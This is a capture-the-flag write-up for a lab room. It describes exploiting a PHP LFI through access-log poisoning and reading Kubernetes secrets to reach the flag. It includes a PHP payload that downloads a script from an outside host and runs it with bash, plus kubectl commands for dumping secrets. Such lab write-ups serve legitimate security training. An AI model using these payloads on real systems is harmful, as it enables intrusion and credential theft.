Description
Room Link: Island Orchestration
Only one flag to catch … !
Recon
Using nmap
, we can find that there are two open ports.
Nmap scan report for 10.10.160.23
Host is up, received reset ttl 255 (0.013s latency).
Not shown: 998 filtered tcp ports (no-response)
PORT STATE SERVICE REASON
22/tcp open ssh syn-ack ttl 64
80/tcp open http syn-ack ttl 64
Port 80
We have a PHP webapp on port 80
It seems that we are dealing with a Local File Inclusion (LFI) vulnerability. LFI vulnerabilities allow an attacker to include local files on the target system in HTTP requests and access their contents. There are many resources available online, that can help with identifying and exploiting LFI vulnerabilities.
To get a reverse shell on this web application, we can try including the Apache2 access_log
or access.log
file. I actually ended up by finding the location of this file by reading the /proc/self/fd/6
file.
I injected a payload into the User-Agent
value. Some PHP web applications use functions such as file_get_contents
or fopen
to include/read external files, but these functions do not execute PHP code.
Only functions like include
, require
, include_once
, and require_once
can execute PHP codes.
Anyway, It seems that we have successfully gained Remote Code Execution (RCE) .
To get a reverse shell, I injected this payload:
<?php file_put_contents('/tmp/s.sh',file_get_contents('http://10.8.48.23:8001/s.sh'),FILE_APPEND);system('bash /tmp/s.sh');?>
I wasn’t able to find some linux binaries such ifconfig
, curl
…
I immediately suspected that we were inside a Docker container or a similar environment. In such cases, I often use a repository of Linux static binaries that I have collected linux-static-binaries.
So let’s upload ifconfig
and see what we have here
It looks like our suspicion was correct and we are indeed inside a Docker container. To see if there are any other containers on the system, we can use this nmap static binary nmap-static-binaries.
After uploading it
./nmap 172.17.0.0/24 -vvv
output:
Nmap scan report for ip-172-17-0-1.eu-west-1.compute.internal (172.17.0.1)
Host is up, received conn-refused (0.00027s latency).
Scanned at 2022-06-25 15:38:09 UTC for 4s
Not shown: 997 closed ports
Reason: 997 conn-refused
PORT STATE SERVICE REASON
22/tcp open ssh syn-ack
8443/tcp open https-alt syn-ack
30000/tcp filtered ndmps no-response
Nmap scan report for coredns-78fcd69978-ttkch (172.17.0.2)
Host is up, received conn-refused (0.00029s latency).
Scanned at 2022-06-25 15:38:09 UTC for 3s
Not shown: 997 closed ports
Reason: 997 conn-refused
PORT STATE SERVICE REASON
53/tcp open domain syn-ack
8080/tcp open http-proxy syn-ack
8181/tcp open intermapper syn-ack
Nmap scan report for islands-7655b7749f-zvq52 (172.17.0.3)
Host is up, received syn-ack (0.00030s latency).
Scanned at 2022-06-25 15:38:09 UTC for 3s
Not shown: 999 closed ports
Reason: 999 conn-refused
PORT STATE SERVICE REASON
80/tcp open http syn-ack
There are 3 hosts
172.17.0.1
From the ports 10250
, 10256
and 8443
looks like a kubernetes server
./nmap 172.17.0.1 -p- -vvv
Host is up, received conn-refused (0.00013s latency).
Scanned at 2022-06-25 15:39:27 UTC for 3s
Not shown: 65528 closed ports
Reason: 65528 conn-refused
PORT STATE SERVICE REASON
22/tcp open ssh syn-ack
2376/tcp open docker syn-ack
8443/tcp open https-alt syn-ack
10249/tcp open unknown syn-ack
10250/tcp open unknown syn-ack
10256/tcp open unknown syn-ack
30000/tcp filtered ndmps no-response
172.17.0.2
I didn’t know what this host was doing …
./nmap -sC -sV 172.17.0.2 -p- -vvv
Host is up, received conn-refused (0.00013s latency).
Scanned at 2022-06-25 15:38:54 UTC for 16s
Not shown: 65531 closed ports
Reason: 65531 conn-refused
PORT STATE SERVICE REASON VERSION
53/tcp open tcpwrapped syn-ack
8080/tcp open http syn-ack Golang net/http server (Go-IPFS json-rpc or InfluxDB API)
|_http-title: Site doesn't have a title (text/plain; charset=utf-8).
8181/tcp open http syn-ack Golang net/http server (Go-IPFS json-rpc or InfluxDB API)
|_http-title: Site doesn't have a title (text/plain; charset=utf-8).
9153/tcp open http syn-ack Golang net/http server (Go-IPFS json-rpc or InfluxDB API)
|_http-title: Site doesn't have a title (text/plain; charset=utf-8).
Kubernetes
One of the first things I usually do is download kubectl
, which is a command-line tool for controlling Kubernetes clusters.
curl -LO "https://dl.k8s.io/release/$(curl -L -s https://dl.k8s.io/release/stable.txt)/bin/linux/amd64/kubectl"
Let’s try to list pods
./kubectl get pods
It seems that the user does not have the necessary permissions to list pods, so let’s inspect authorization first
We can use the following command to see what our current user is authorized to do
./kubectl auth can-i --list
There is a resource called secrets
that we can examine. Secrets in Kubernetes are objects that contain sensitive data, such as passwords, OAuth tokens, and SSH keys. By checking the secrets resource, we may be able to find sensitive information that could be useful for accessing other resources or escalating privileges.
./kubectl get secrets
It seems that we are making progress and getting closer to finding the flag …
./kubectl describe secrets/flag
./kubectl describe secrets/flag
Flag
./kubectl get secret flag -o=json
We are able to obtain the flag by base64 decoding the value of the flag.